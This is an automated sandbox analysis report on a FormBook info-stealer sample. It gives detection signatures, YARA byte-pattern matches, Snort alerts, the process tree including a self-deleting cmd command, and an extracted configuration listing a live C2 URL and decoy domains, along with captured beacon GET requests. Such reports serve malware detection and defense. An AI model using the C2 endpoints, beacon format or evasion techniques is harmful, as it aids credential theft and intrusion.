Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report 350969bc_by_Libranalysis

Overview

General Information

Sample Name:350969bc_by_Libranalysis (renamed file extension from none to exe)
Analysis ID:412308
MD5:350969bc82ec33af12acf100c41eb4d1
SHA1:f17d5fc8bad55cc2b523173b43585e9edb9154e4
SHA256:961ac1d96eb469d4a949c18c25de7bf7d3ad79a502794b470a3505fa8b65d023
Tags:Formbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • 350969bc_by_Libranalysis.exe (PID: 6988 cmdline: 'C:\Users\user\Desktop\350969bc_by_Libranalysis.exe' MD5: 350969BC82EC33AF12ACF100C41EB4D1)
    • 350969bc_by_Libranalysis.exe (PID: 3416 cmdline: C:\Users\user\Desktop\350969bc_by_Libranalysis.exe MD5: 350969BC82EC33AF12ACF100C41EB4D1)
      • explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • control.exe (PID: 6576 cmdline: C:\Windows\SysWOW64\control.exe MD5: 40FBA3FBFD5E33E0DE1BA45472FDA66F)
          • cmd.exe (PID: 6260 cmdline: /c del 'C:\Users\user\Desktop\350969bc_by_Libranalysis.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 7160 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.sabaidiving.com/i6rd/"], "decoy": ["blissfulbeeboutique.online", "syazanisuhaimi.com", "designaliveeuk.com", "andradeasfora.com", "barnesandn.com", "onlinecasinocrazy.com", "cornerstonemedwa.com", "fijiherald.com", "experienciaswagon.com", "cityofhouston.info", "thebenefitssherpa.com", "honeyew.com", "sliceinvestors.com", "socialeconomic.net", "ballisticjet.com", "fortuneland.fund", "globaleranking.com", "gracestationchurch.com", "mixigo.net", "ximibabes.com", "morooka.club", "kittycarehotel.com", "solartenacres.com", "bunies3.com", "celery.store", "grayboxus.com", "haopianba.com", "021rencai.net", "cortinasenrollablesloscabos.com", "qiaosouwenku.com", "856379607.xyz", "urgentdocservices.com", "countrywideeconomy.com", "onemoresysadmin.com", "salemerket.com", "susiebennett.com", "comedyforyou.com", "satssar.com", "woo.education", "shellgang.com", "wattaccounting.com", "mandapeoplesyatem.com", "cavaliertrimmershop.com", "netfx-service.com", "s138s9.com", "smoothome.com", "cabinhealthy.com", "sexyvenushuegel.net", "jsvending.info", "gej2holdings.com", "arcticluxuryvillas.com", "shinsotoknives.com", "mardigrasdecorators.com", "ainongshucai.com", "ricdevan.com", "boringcode.net", "thebotanicaltype.com", "jewelonsale.com", "sunstatepipelines.com", "jasontaylor.online", "clipsquote.com", "toypoodlebreedershome.com", "thearcadelounge.com", "unico-m.online"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000A.00000002.916735490.0000000000540000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    0000000A.00000002.916735490.0000000000540000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    0000000A.00000002.916735490.0000000000540000.00000004.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166b9:$sqlite3step: 68 34 1C 7B E1
    • 0x167cc:$sqlite3step: 68 34 1C 7B E1
    • 0x166e8:$sqlite3text: 68 38 2A 90 C5
    • 0x1680d:$sqlite3text: 68 38 2A 90 C5
    • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
    00000005.00000002.715972789.0000000001090000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000005.00000002.715972789.0000000001090000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 15 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      5.2.350969bc_by_Libranalysis.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        5.2.350969bc_by_Libranalysis.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        5.2.350969bc_by_Libranalysis.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x166b9:$sqlite3step: 68 34 1C 7B E1
        • 0x167cc:$sqlite3step: 68 34 1C 7B E1
        • 0x166e8:$sqlite3text: 68 38 2A 90 C5
        • 0x1680d:$sqlite3text: 68 38 2A 90 C5
        • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
        5.2.350969bc_by_Libranalysis.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          5.2.350969bc_by_Libranalysis.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x13895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x13381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x13997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x859a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x125fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x9312:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18987:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 1 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000005.00000002.715972789.0000000001090000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.sabaidiving.com/i6rd/"], "decoy": ["blissfulbeeboutique.online", "syazanisuhaimi.com", "designaliveeuk.com", "andradeasfora.com", "barnesandn.com", "onlinecasinocrazy.com", "cornerstonemedwa.com", "fijiherald.com", "experienciaswagon.com", "cityofhouston.info", "thebenefitssherpa.com", "honeyew.com", "sliceinvestors.com", "socialeconomic.net", "ballisticjet.com", "fortuneland.fund", "globaleranking.com", "gracestationchurch.com", "mixigo.net", "ximibabes.com", "morooka.club", "kittycarehotel.com", "solartenacres.com", "bunies3.com", "celery.store", "grayboxus.com", "haopianba.com", "021rencai.net", "cortinasenrollablesloscabos.com", "qiaosouwenku.com", "856379607.xyz", "urgentdocservices.com", "countrywideeconomy.com", "onemoresysadmin.com", "salemerket.com", "susiebennett.com", "comedyforyou.com", "satssar.com", "woo.education", "shellgang.com", "wattaccounting.com", "mandapeoplesyatem.com", "cavaliertrimmershop.com", "netfx-service.com", "s138s9.com", "smoothome.com", "cabinhealthy.com", "sexyvenushuegel.net", "jsvending.info", "gej2holdings.com", "arcticluxuryvillas.com", "shinsotoknives.com", "mardigrasdecorators.com", "ainongshucai.com", "ricdevan.com", "boringcode.net", "thebotanicaltype.com", "jewelonsale.com", "sunstatepipelines.com", "jasontaylor.online", "clipsquote.com", "toypoodlebreedershome.com", "thearcadelounge.com", "unico-m.online"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: 350969bc_by_Libranalysis.exeReversingLabs: Detection: 36%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000000A.00000002.916735490.0000000000540000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.715972789.0000000001090000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.715159107.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.715784952.0000000000F30000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.917116074.00000000027A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.664412012.0000000004449000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 5.2.350969bc_by_Libranalysis.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.350969bc_by_Libranalysis.exe.400000.0.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: 350969bc_by_Libranalysis.exeJoe Sandbox ML: detected
          Source: 5.2.350969bc_by_Libranalysis.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 350969bc_by_Libranalysis.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 350969bc_by_Libranalysis.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000006.00000002.927845340.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: 350969bc_by_Libranalysis.exe, 00000005.00000002.716595208.000000000150F000.00000040.00000001.sdmp, control.exe, 0000000A.00000002.917676235.0000000004710000.00000040.00000001.sdmp
          Source: Binary string: control.pdb source: 350969bc_by_Libranalysis.exe, 00000005.00000002.716167439.000000000114A000.00000004.00000020.sdmp
          Source: Binary string: wntdll.pdb source: 350969bc_by_Libranalysis.exe, control.exe
          Source: Binary string: control.pdbUGP source: 350969bc_by_Libranalysis.exe, 00000005.00000002.716167439.000000000114A000.00000004.00000020.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000006.00000002.927845340.0000000005A00000.00000002.00000001.sdmp

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49752 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49752 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49752 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49764 -> 103.15.186.68:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49764 -> 103.15.186.68:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49764 -> 103.15.186.68:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49770 -> 23.227.38.74:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49770 -> 23.227.38.74:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49770 -> 23.227.38.74:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49771 -> 192.64.147.164:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49771 -> 192.64.147.164:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49771 -> 192.64.147.164:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.sabaidiving.com/i6rd/
          Source: global trafficHTTP traffic detected: GET /i6rd/?gHSLCj58=LPK2IT8klZq3HV5LkVv0HrUERmrfkAigbODxoDO8ybIsb03GvAFTkZSuj3fGszWvHktP&9rJ=N8YdlZih HTTP/1.1Host: www.thebenefitssherpa.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /i6rd/?gHSLCj58=erkeaSWQY+Clkg2r/Pi/REnUuZTidSmaWK+TmjN6ZRgeJAvAzvFr0iNL5kMJBQzOKWdi&9rJ=N8YdlZih HTTP/1.1Host: www.onlinecasinocrazy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /i6rd/?gHSLCj58=smN73hIgGm+8k6TIdjzBFwruzJIggaSM7b/fO07bhI8vXH2xBAb/Cwk8Hoq4ZaNv9SU/&9rJ=N8YdlZih HTTP/1.1Host: www.blissfulbeeboutique.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /i6rd/?gHSLCj58=OPhbRlTkoXrsQ0r3dKw1IvWRRcBcb3Q4dmj86tcXQUJSZPkW56a8j7HjPVLeeIGxTFMj&9rJ=N8YdlZih HTTP/1.1Host: www.cityofhouston.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /i6rd/?gHSLCj58=ghT/ntM+diyN3YW/4q0tO05CJd4dCe68Gx0VtJcOz7kJ2fBcIsU6AMgtishNfwDLzL+S&9rJ=N8YdlZih HTTP/1.1Host: www.socialeconomic.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /i6rd/?gHSLCj58=87tzyM19Su4M9sklYGX+FxwUh158b1qmSh9f/APlSoINpVQ2gCQ5Erv1vAVp92mNDUWx&9rJ=N8YdlZih HTTP/1.1Host: www.toypoodlebreedershome.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /i6rd/?gHSLCj58=lFTIMkQ5ik6igxl0SADoA/l4wqgGqwWePHw2ryfpEDmwfQ+0wMbe0XdxLJthRM6xta9b&9rJ=N8YdlZih HTTP/1.1Host: www.ricdevan.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /i6rd/?gHSLCj58=/0C7Nd/5ZhwBGDRTMer0ywO01wFnuraj4upl6M1zLF0nwnsKqCnReLNuI6TuwxtThkOZ&9rJ=N8YdlZih HTTP/1.1Host: www.ximibabes.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /i6rd/?gHSLCj58=kbJM45GZrQKbh6aR4KV/wVFZMmwDJvkUUs1obqo0rCdmSsWUtmFh0yx89FvYawyrRJzX&9rJ=N8YdlZih HTTP/1.1Host: www.sabaidiving.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /i6rd/?gHSLCj58=wbIaUdvQqzQbHKzWrifpae4yz+HPBnPf3VQSw8NlhdhOO9H/uFvMKdwnlncPTgk9QTjs&9rJ=N8YdlZih HTTP/1.1Host: www.onemoresysadmin.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /i6rd/?gHSLCj58=HOLe4E5VAs/9VGl0AghSjQ5UDYBgOj/qhjKLxJJROTaYJ7IE9VG9ZYc05xBD+gnk3HpC&9rJ=N8YdlZih HTTP/1.1Host: www.countrywideeconomy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 52.58.78.16 52.58.78.16
          Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
          Source: Joe Sandbox ViewASN Name: VOODOO1US VOODOO1US
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: global trafficHTTP traffic detected: GET /i6rd/?gHSLCj58=LPK2IT8klZq3HV5LkVv0HrUERmrfkAigbODxoDO8ybIsb03GvAFTkZSuj3fGszWvHktP&9rJ=N8YdlZih HTTP/1.1Host: www.thebenefitssherpa.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /i6rd/?gHSLCj58=erkeaSWQY+Clkg2r/Pi/REnUuZTidSmaWK+TmjN6ZRgeJAvAzvFr0iNL5kMJBQzOKWdi&9rJ=N8YdlZih HTTP/1.1Host: www.onlinecasinocrazy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /i6rd/?gHSLCj58=smN73hIgGm+8k6TIdjzBFwruzJIggaSM7b/fO07bhI8vXH2xBAb/Cwk8Hoq4ZaNv9SU/&9rJ=N8YdlZih HTTP/1.1Host: www.blissfulbeeboutique.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /i6rd/?gHSLCj58=OPhbRlTkoXrsQ0r3dKw1IvWRRcBcb3Q4dmj86tcXQUJSZPkW56a8j7HjPVLeeIGxTFMj&9rJ=N8YdlZih HTTP/1.1Host: www.cityofhouston.infoConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /i6rd/?gHSLCj58=ghT/ntM+diyN3YW/4q0tO05CJd4dCe68Gx0VtJcOz7kJ2fBcIsU6AMgtishNfwDLzL+S&9rJ=N8YdlZih HTTP/1.1Host: www.socialeconomic.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /i6rd/?gHSLCj58=87tzyM19Su4M9sklYGX+FxwUh158b1qmSh9f/APlSoINpVQ2gCQ5Erv1vAVp92mNDUWx&9rJ=N8YdlZih HTTP/1.1Host: www.toypoodlebreedershome.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /i6rd/?gHSLCj58=lFTIMkQ5ik6igxl0SADoA/l4wqgGqwWePHw2ryfpEDmwfQ+0wMbe0XdxLJthRM6xta9b&9rJ=N8YdlZih HTTP/1.1Host: www.ricdevan.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /i6rd/?gHSLCj58=/0C7Nd/5ZhwBGDRTMer0ywO01wFnuraj4upl6M1zLF0nwnsKqCnReLNuI6TuwxtThkOZ&9rJ=N8YdlZih HTTP/1.1Host: www.ximibabes.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /i6rd/?gHSLCj58=kbJM45GZrQKbh6aR4KV/wVFZMmwDJvkUUs1obqo0rCdmSsWUtmFh0yx89FvYawyrRJzX&9rJ=N8YdlZih HTTP/1.1Host: www.sabaidiving.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /i6rd/?gHSLCj58=wbIaUdvQqzQbHKzWrifpae4yz+HPBnPf3VQSw8NlhdhOO9H/uFvMKdwnlncPTgk9QTjs&9rJ=N8YdlZih HTTP/1.1Host: www.onemoresysadmin.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /i6rd/?gHSLCj58=HOLe4E5VAs/9VGl0AghSjQ5UDYBgOj/qhjKLxJJROTaYJ7IE9VG9ZYc05xBD+gnk3HpC&9rJ=N8YdlZih HTTP/1.1Host: www.countrywideeconomy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.thebenefitssherpa.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0Date: Wed, 12 May 2021 13:48:08 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 387Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 63 69 74 79 6f 66 68 6f 75 73 74 6f 6e 2e 69 6e 66 6f 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache Server at www.cityofhouston.info Port 80</address></body></html>
          Source: 350969bc_by_Libranalysis.exeString found in binary or memory: Http://google.com.br
          Source: explorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: 350969bc_by_Libranalysis.exe, 00000000.00000002.662905887.0000000003441000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: explorer.exe, 00000006.00000000.666349326.0000000002B50000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: control.exe, 0000000A.00000002.918833437.0000000004DC2000.00000004.00000001.sdmpString found in binary or memory: http://www.countrywideeconomy.com
          Source: control.exe, 0000000A.00000002.918833437.0000000004DC2000.00000004.00000001.sdmpString found in binary or memory: http://www.countrywideeconomy.com/
          Source: explorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
          Source: explorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000006.00000000.687689175.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
